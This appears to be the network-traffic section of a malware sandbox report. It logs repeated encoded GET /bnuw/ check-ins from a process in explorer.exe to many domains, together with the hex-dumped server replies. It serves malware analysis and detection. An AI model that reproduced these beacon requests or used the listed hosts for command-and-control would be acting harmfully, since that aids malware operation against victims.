                                                                                                                                                        Jan 27, 2021 15:40:51.629750013 CET5409OUTGET /bnuw/?Mv0h=sBaVa8kj+YCbP3U2o3QVtpVj9pzNwi4112+9WTWVNa3X8ft1LfuComp0EF+DLQnGsCaK&VPXh=GhIH HTTP/1.1
                                                                                                                                                        Host: www.dmvantalya.com
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                        Data Ascii:
                                                                                                                                                        Jan 27, 2021 15:40:51.940468073 CET5409INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx
                                                                                                                                                        Date: Wed, 27 Jan 2021 14:40:51 GMT
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                        Data Raw: 36 39 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 2f 6a 73 2f 77 77 64 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 69<html><head><script type='text/javascript' src='/js/wwd.js'></script></head><body></script></body></html>0


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        11192.168.2.54974446.38.226.4780C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Jan 27, 2021 15:40:57.111819983 CET5411OUTGET /bnuw/?Mv0h=/+b+PR1HqbzITR/xPqvCXgD2JDomfeuYUy/NSf/Itxe+SMeGrZJLG9WamYt6TAOy7qnF&VPXh=GhIH HTTP/1.1
                                                                                                                                                        Host: www.husum-ferienwohnungen.com
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                        Data Ascii:
                                                                                                                                                        Jan 27, 2021 15:40:57.161020994 CET5412INHTTP/1.1 404 Not Found
                                                                                                                                                        Server: nginx
                                                                                                                                                        Date: Wed, 27 Jan 2021 14:40:57 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 1039
                                                                                                                                                        Connection: close
                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                        Last-Modified: Tue, 24 Feb 2015 16:29:52 GMT
                                                                                                                                                        ETag: "40f-50fd8074406b0"
                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                        Data Raw: 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 42 41 53 45 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 5f 64 6f 63 73 2f 22 3e 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 3c 2f 42 41 53 45 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 64 6f 63 75 6d 65 6e 74 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 50 3e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 0a 57 65 62 20 53 65 72 76 65 72 20 61 74 20 77 65 62 31 32 32 2e 73 65 72 76 65 72 30 31 2e 66 72 75 69 74 6d 65 64 69 61 2e 64 65 0a 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 72 65 74 75 72 6e 73 0a 20 20 20 2d 20 69 74 73 20 6f 77 6e 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 2e 20 59 6f 75 20 63 61 6e 20 74 75 72 6e 20 74 68 61 74 20 6f 66 66 2c 0a 20 20 20 2d 20 62 75 74 20 69 74 27 73 20 70 72 65 74 74 79 20 74 72 69 63 6b 79 20 74 6f 20 66 69 6e 64 20 73 77 69 74 63 68 20 63 61 6c 6c 65 64 0a 20 20 20 2d 20 22 73 6d 61 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 22 2e 20 54 68 61 74 20 6d 65 61 6e 73 2c 20 6f 66 20 63 6f 75 72 73 65 2c 0a 20 20 20 2d 20 74 68 61 74 20 73 68 6f 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 74 68 61 74 20 61 72 65 20 6c 6f 6e 67 0a 20 20 20 2d 20 65 6e 6f 75 67 68 20 74 6f 20 6d 61 6b 65 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 68 61 70 70 79 2e 20 54 68 65 0a 20 20 20 2d 20 77 6f 72 6b 61 72 6f 75 6e 64 20 69 73 20 70 72 65 74 74 79 20 73 69 6d 70 6c 65 3a 20 70 61 64 20 74 68 65 20 65 72 72 6f 72 0a 20 20 20 2d 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 61 20 62 69 67 20 63 6f 6d 6d 65 6e 74 20 6c 69 6b 65 20 74 68 69 73 20 74 6f 20 70 75 73 68 20 69 74 0a 20 20 20 2d 20 6f 76 65 72 20 74 68 65 20 66 69 76 65 20 68 75 6e 64 72 65 64 20 61 6e 64 20 74 77 65 6c 76 65 20 62 79 74 65 73 20 6d 69 6e 69 6d 75 6d 2e 0a 20 20 20 2d 20 4f 66 20 63 6f 75 72 73 65 2c 20 74 68 61 74 27 73 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 72 65 61 64 69 6e 67 0a 20 20 20 2d 20 72 69 67 68 74 20 6e 6f 77 2e 0a 20 20 20 2d 2d 3e 0a
                                                                                                                                                        Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE><BASE href="/error_docs/">...[if lte IE 6]></BASE><![endif]--></HEAD><BODY><H1>Not Found</H1>The requested document was not found on this server.<P><HR><ADDRESS>Web Server at web122.server01.fruitmedia.de</ADDRESS></BODY></HTML>... - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, - but it's pretty tricky to find switch called - "smart error messages". That means, of course, - that short error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error - message with a big comment like this to push it - over the five hundred and twelve bytes minimum. - Of course, that's exactly what you're reading - right now. -->


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        12192.168.2.549745184.168.131.24180C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Jan 27, 2021 15:41:05.444685936 CET5413OUTGET /bnuw/?Mv0h=ilxBzx5jzN5hMHP3lEnoWOla5UnSCnIEyVz4htafUXtg/D1GhDNvtcAOSSVsQdsK+0zz&VPXh=GhIH HTTP/1.1
                                                                                                                                                        Host: www.swiftappliancessc.com
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                        Data Ascii:
                                                                                                                                                        Jan 27, 2021 15:41:05.679910898 CET5413INHTTP/1.1 301 Moved Permanently
                                                                                                                                                        Server: nginx/1.16.1
                                                                                                                                                        Date: Wed, 27 Jan 2021 14:41:05 GMT
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        Location: https://www.swiftappliancesc.com/bnuw/?Mv0h=ilxBzx5jzN5hMHP3lEnoWOla5UnSCnIEyVz4htafUXtg/D1GhDNvtcAOSSVsQdsK+0zz&VPXh=GhIH
                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 0


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        13192.168.2.54974669.163.224.16880C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Jan 27, 2021 15:41:11.142014980 CET5414OUTGET /bnuw/?Mv0h=UaN922MvMgW8WO4gu4dCtZfuQaKmG0MLXVbxDGTLVk691LjZJH+3nMRa/tXw417tQlSj&VPXh=GhIH HTTP/1.1
                                                                                                                                                        Host: www.state728.com
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                        Data Ascii:
                                                                                                                                                        Jan 27, 2021 15:41:13.142405033 CET5416INHTTP/1.1 404 Not Found
                                                                                                                                                        Date: Wed, 27 Jan 2021 14:41:11 GMT
                                                                                                                                                        Server: Apache
                                                                                                                                                        Vary: Accept-Encoding,Cookie,User-Agent
                                                                                                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                        Link: <http://www.state728.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                        Upgrade: h2
                                                                                                                                                        Connection: Upgrade, close
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Data Raw: 35 32 66 65 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 62 6a 65 63 74 22 20 2f 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 4e 6f 74 20 46 6f 75 6e 64 2c 20 45 72 72 6f 72 20 34 30 34 22 20 2f 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 53 74 61 74 65 37 32 38 22 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 31 34 2e 38 2e 31 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 2c 20 45 72 72 6f 72 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 53 74 61 74 65 37 32 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 53 74 61 74 65 37 32 38 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74
                                                                                                                                                        Data Ascii: 52fe<!doctype html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><meta name="robots" content="noindex,follow" /><meta property="og:locale" content="en_US" /><meta property="og:type" content="object" /><meta property="og:title" content="Not Found, Error 404" /><meta property="og:site_name" content="State728" />... This site is optimized with the Yoast SEO plugin v14.8.1 - https://yoast.com/wordpress/plugins/seo/ --><title>Not Found, Error 404</title><meta name="robots" content="noindex, follow" /><meta property="og:locale" content="en_US" /><meta property="og:title" content="Page not found - State728" /><meta property="og:site_name" content="State728" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"htt


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        14192.168.2.549747192.254.186.13580C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Jan 27, 2021 15:41:21.965167046 CET5429OUTGET /bnuw/?Mv0h=msgcY/GKR2+7Ty9qVKTu9pnyQy/WbDn9v8bhS9H73S6U4m0FMdY0GWjCttMprcSB8tfS&VPXh=GhIH HTTP/1.1
                                                                                                                                                        Host: www.taxandbookkeepingsolutions.com
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                        Data Ascii:
                                                                                                                                                        Jan 27, 2021 15:41:25.341475010 CET5721INHTTP/1.1 301 Moved Permanently
                                                                                                                                                        Date: Wed, 27 Jan 2021 14:41:22 GMT
                                                                                                                                                        Server: Apache
                                                                                                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                        X-Redirect-By: WordPress
                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                        Connection: Upgrade, close
                                                                                                                                                        Location: http://taxandbookkeepingsolutions.com/bnuw/?Mv0h=msgcY/GKR2+7Ty9qVKTu9pnyQy/WbDn9v8bhS9H73S6U4m0FMdY0GWjCttMprcSB8tfS&VPXh=GhIH
                                                                                                                                                        X-Endurance-Cache-Level: 2
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        15192.168.2.549755118.27.99.2580C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Jan 27, 2021 15:41:27.762258053 CET5994OUTGET /bnuw/?Mv0h=ZkQWQs3u/Pcsc6Be2UsBBupV9psrlEYt+FgoIT3sSBI7ln8n9R9tp98wLB1cQ9m1FW6z&VPXh=GhIH HTTP/1.1
                                                                                                                                                        Host: www.rotalablog.com
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                        Data Ascii:
                                                                                                                                                        Jan 27, 2021 15:41:28.048121929 CET6119INHTTP/1.1 301 Moved Permanently
                                                                                                                                                        Server: nginx
                                                                                                                                                        Date: Wed, 27 Jan 2021 14:41:27 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 162
                                                                                                                                                        Connection: close
                                                                                                                                                        Location: https://www.rotalablog.com/bnuw/?Mv0h=ZkQWQs3u/Pcsc6Be2UsBBupV9psrlEYt+FgoIT3sSBI7ln8n9R9tp98wLB1cQ9m1FW6z&VPXh=GhIH
                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        16192.168.2.549759149.210.170.23580C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Jan 27, 2021 15:41:33.105868101 CET6284OUTGET /bnuw/?Mv0h=9icL5DbtPB2as1Zd6Xg9EreNcG85hnBQd3Q23kTehbS+jnaTFoKfU18SI/G9uvH42aor&VPXh=GhIH HTTP/1.1
                                                                                                                                                        Host: www.expand.care
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                        Data Ascii:
                                                                                                                                                        Jan 27, 2021 15:41:33.161778927 CET6285INHTTP/1.1 301 Moved Permanently
                                                                                                                                                        Date: Wed, 27 Jan 2021 14:41:33 GMT
                                                                                                                                                        Server: Apache
                                                                                                                                                        Location: https://www.expand.care/bnuw/?Mv0h=9icL5DbtPB2as1Zd6Xg9EreNcG85hnBQd3Q23kTehbS+jnaTFoKfU18SI/G9uvH42aor&VPXh=GhIH
                                                                                                                                                        Content-Length: 325
                                                                                                                                                        Connection: close
                                                                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                        X-TransIP-Backend: web870
                                                                                                                                                        X-TransIP-Balancer: balancer7
                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 65 78 70 61 6e 64 2e 63 61 72 65 2f 62 6e 75 77 2f 3f 4d 76 30 68 3d 39 69 63 4c 35 44 62 74 50 42 32 61 73 31 5a 64 36 58 67 39 45 72 65 4e 63 47 38 35 68 6e 42 51 64 33 51 32 33 6b 54 65 68 62 53 2b 6a 6e 61 54 46 6f 4b 66 55 31 38 53 49 2f 47 39 75 76 48 34 32 61 6f 72 26 61 6d 70 3b 56 50 58 68 3d 47 68 49 48 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.expand.care/bnuw/?Mv0h=9icL5DbtPB2as1Zd6Xg9EreNcG85hnBQd3Q23kTehbS+jnaTFoKfU18SI/G9uvH42aor&amp;VPXh=GhIH">here</a>.</p></body></html>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        17192.168.2.54976051.195.43.21480C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Jan 27, 2021 15:41:38.235146999 CET6286OUTGET /bnuw/?Mv0h=mq8FdBnXvVD55s8LjK9FZEvCV1OO/e8xkuyico0eSbMj5rSpqU8yGo4yf+6JoC4UpbW1&VPXh=GhIH HTTP/1.1
                                                                                                                                                        Host: www.alliswell.info
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                        Data Ascii:
                                                                                                                                                        Jan 27, 2021 15:41:38.288887978 CET6286INHTTP/1.1 302 Found
                                                                                                                                                        date: Wed, 27 Jan 2021 14:41:38 GMT
                                                                                                                                                        location: https://www.alliswell.info/bnuw/?Mv0h=mq8FdBnXvVD55s8LjK9FZEvCV1OO/e8xkuyico0eSbMj5rSpqU8yGo4yf+6JoC4UpbW1&VPXh=GhIH
                                                                                                                                                        content-length: 0
                                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                                        connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        18192.168.2.549761172.120.228.8880C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Jan 27, 2021 15:41:43.499735117 CET6287OUTGET /bnuw/?Mv0h=unzmywU5hP7O9pQ/VNJ9lipk3GER0gynknqK6ctL9m3B0ma88PcLaMbDy7KFiKVjmiKo&VPXh=GhIH HTTP/1.1
                                                                                                                                                        Host: www.czb878.com
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                        Data Ascii:
                                                                                                                                                        Jan 27, 2021 15:41:43.691905975 CET6288INHTTP/1.1 301 Moved Permanently
                                                                                                                                                        Server: nginx
                                                                                                                                                        Date: Wed, 27 Jan 2021 14:41:43 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 162
                                                                                                                                                        Connection: close
                                                                                                                                                        Location: https://www.czb878.com/bnuw/?Mv0h=unzmywU5hP7O9pQ/VNJ9lipk3GER0gynknqK6ctL9m3B0ma88PcLaMbDy7KFiKVjmiKo&VPXh=GhIH
                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        19192.168.2.549762192.0.78.2580C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Jan 27, 2021 15:41:48.741029024 CET6289OUTGET /bnuw/?Mv0h=QSs7jQDeFsICiQBBJT3dneCSujMK1kRtf3DX2CBTXjaAl0pqu+ZlchGrg3MzDtdcBC8Q&VPXh=GhIH HTTP/1.1
                                                                                                                                                        Host: www.brendonellis.com
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                        Data Ascii:
                                                                                                                                                        Jan 27, 2021 15:41:48.783169031 CET6289INHTTP/1.1 301 Moved Permanently
                                                                                                                                                        Server: nginx
                                                                                                                                                        Date: Wed, 27 Jan 2021 14:41:48 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 162
                                                                                                                                                        Connection: close
                                                                                                                                                        Location: https://www.brendonellis.com/bnuw/?Mv0h=QSs7jQDeFsICiQBBJT3dneCSujMK1kRtf3DX2CBTXjaAl0pqu+ZlchGrg3MzDtdcBC8Q&VPXh=GhIH
                                                                                                                                                        X-ac: 2.hhn _dca
                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        2192.168.2.549734149.210.170.23580C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Jan 27, 2021 15:40:02.692450047 CET5339OUTGET /bnuw/?Mv0h=9icL5DbtPB2as1Zd6Xg9EreNcG85hnBQd3Q23kTehbS+jnaTFoKfU18SI/G9uvH42aor&VPXh=GhIH HTTP/1.1
                                                                                                                                                        Host: www.expand.care
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                        Data Ascii:
                                                                                                                                                        Jan 27, 2021 15:40:02.758419037 CET5339INHTTP/1.1 301 Moved Permanently
                                                                                                                                                        Date: Wed, 27 Jan 2021 14:40:02 GMT
                                                                                                                                                        Server: Apache
                                                                                                                                                        Location: https://www.expand.care/bnuw/?Mv0h=9icL5DbtPB2as1Zd6Xg9EreNcG85hnBQd3Q23kTehbS+jnaTFoKfU18SI/G9uvH42aor&VPXh=GhIH
                                                                                                                                                        Content-Length: 325
                                                                                                                                                        Connection: close
